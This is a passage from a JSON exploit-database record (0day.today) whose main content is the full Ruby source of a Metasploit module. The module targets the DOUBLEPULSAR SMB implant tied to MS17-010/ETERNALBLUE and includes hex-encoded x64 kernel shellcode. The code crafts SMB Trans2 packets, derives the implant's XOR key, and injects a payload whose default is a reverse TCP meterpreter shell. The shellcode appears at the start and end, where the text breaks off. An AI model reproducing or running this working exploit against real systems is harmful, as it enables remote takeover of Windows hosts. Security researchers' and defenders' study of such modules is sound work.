\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-19] #"}, "lastseen": "2021-10-18T22:17:39", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "69467ee0f1222fc9fb750d229d6cdd23", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-20T08:18:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-20T08:18:11", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-20T08:18:11", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n 